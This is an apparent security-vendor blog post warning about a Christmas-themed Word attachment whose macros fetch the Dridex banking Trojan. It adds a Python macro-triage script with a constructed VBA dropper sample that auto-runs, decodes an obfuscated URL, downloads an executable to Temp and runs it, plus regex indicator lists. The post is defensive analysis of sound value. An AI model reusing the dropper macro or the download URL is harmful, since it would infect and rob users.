THIS SEASON, SANTA’S GOT “CHRISTMAS OFFERS” AND A VIRUS OR TWO IN STORE FOR YOU
’Tis the season to be jolly, and to infect a few hundred PCs with a nasty virus while you’re at it!
Spammers are taking advantage of the Christmas season to infect computers all over the world by emailing a tempting Word document named “CHISTMAS OFFERS.docx”. With shoppers hunting for the best holiday gift deals, who wouldn’t be tempted to open such a file?
Recipients who opened the Word document found it blank, with a prompt asking them to enable macros. Microsoft Office disables macros by default, but people were so eager to see the offers that they clicked the Enable Content button and got infected.
Office macros let you write scripts that automate simple document tasks such as copying and pasting. But macros can be a serious security risk, because the same scripting can be used for activities that are thoroughly malicious.
The spammers’ document actually contained several macros, but you cannot see them from within Word because the VBA project was password protected. You can, however, use the OfficeMalScanner tool to extract the macro code and open it in any text editor. Macros are written in Visual Basic for Applications (VBA), which has the ability to download just about any file from any external URL.
By enabling content (that is, macros), you allow that code to run, and to download whatever it was written to download.
Why do people open such files? It’s called social engineering: the email and the document are designed to look absolutely innocent so that you open the attachment.
If you were one of those who trusted the document and enabled its macros, here’s what happens:
The enabled macros download a file from the URL hxxp://jasoncurtis.co.uk/js/bin.exe and run it from your Temp folder. What lands on your PC is a banking Trojan known as Dridex, which Malwarebytes already detects.
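As an added illustration (not code from this article or from Malwarebytes), here is a small Python triage script of the kind an analyst runs over macro source once it has been extracted with OfficeMalScanner. It folds Chr()-obfuscated strings back together, pulls out URLs, flags the auto-exec, download and execute indicators that together make up the download-and-run-from-Temp pattern just described, and defangs what it reports. The macro it analyses is a constructed sample written for this example (only the download URL is the one named above); the indicator lists are a starting point, not a complete signature set.

```python
import re

# Constructed sample of a VBA dropper macro, written here to illustrate the
# pattern described above. It is NOT the macro from the "CHISTMAS OFFERS"
# document; only the download URL is the one reported in the article.
SAMPLE_VBA = r'''
Sub AutoOpen()
    Dim u As String, tmp As String
    ' the scheme is split into Chr() calls, a common trick to hide the URL from grep
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & "://jasoncurtis.co.uk/js/bin.exe"
    tmp = Environ("TEMP") & "\bin.exe"
    URLDownloadToFile 0, u, tmp, 0, 0
    Shell tmp, vbHide
End Sub
'''

# Indicator families an analyst looks for in extracted macro source (assumed
# starting set, not exhaustive).
INDICATORS = {
    "auto-exec trigger": r"\b(?:AutoOpen|Auto_Open|Document_Open|AutoExec|Workbook_Open)\b",
    "download":          r"\b(?:URLDownloadToFile|XMLHTTP|WinHttpRequest|ADODB\.Stream)\b",
    "execution":         r"\b(?:Shell|WScript\.Shell|ShellExecute|CreateObject)\b",
    "drop to temp":      r'Environ\s*\(\s*"TEMP"\s*\)|GetSpecialFolder|\\AppData\\Local\\Temp',
}

# A run of Chr(n) calls joined with "&", e.g. Chr(104) & Chr(116)
CHR_RUN = re.compile(r"Chr\$?\(\s*\d+\s*\)(?:\s*&\s*Chr\$?\(\s*\d+\s*\))*", re.I)
CHR_ONE = re.compile(r"Chr\$?\(\s*(\d+)\s*\)", re.I)
URL_RE = re.compile(r"\bhttps?://[^\s\"'<>]+", re.I)


def deobfuscate(src):
    """Resolve Chr() runs to string literals and join adjacent literals."""
    def fold(m):
        return '"' + "".join(chr(int(n)) for n in CHR_ONE.findall(m.group(0))) + '"'
    plain = CHR_RUN.sub(fold, src)
    # "abc" & "def"  ->  "abcdef"
    return re.sub(r'"\s*&\s*"', "", plain)


def defang(url):
    """Render a URL in the hxxp:// form used in reports so it is not clickable."""
    return "hxxp" + url[4:]


def analyse_macro(src):
    """Return the indicator hits, defanged URLs and a dropper verdict for macro source."""
    plain = deobfuscate(src)
    hits = {}
    for family, pattern in INDICATORS.items():
        found = sorted({m.group(0) for m in re.finditer(pattern, plain, re.I)})
        if found:
            hits[family] = found
    urls = [defang(u) for u in URL_RE.findall(plain)]
    # Runs on open, fetches something and executes it: the dropper pattern.
    dropper = all(k in hits for k in ("auto-exec trigger", "download", "execution"))
    return {"indicators": hits, "urls": urls, "dropper": dropper}


if __name__ == "__main__":
    result = analyse_macro(SAMPLE_VBA)
    for family, found in result["indicators"].items():
        print(f"{family:18s} {', '.join(found)}")
    print("urls:", result["urls"])
    print("dropper:", result["dropper"])
```

Run it on the text file OfficeMalScanner writes out in place of SAMPLE_VBA. The Chr() folding matters in practice: without it the URL never appears as one string and a plain grep for "http" finds nothing.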
While this method is not very high-tech, it has been working well lately: spam emails get unsuspecting victims to download the payload themselves. Those running a proper anti-exploit product (Anti-Exploit Premium) came through the spam email unscathed, because they were warned of the danger before opening the file.
So while you already avoid the classic spam email that obviously carries a virus, be just as wary of emails carrying seemingly harmless Microsoft Office documents.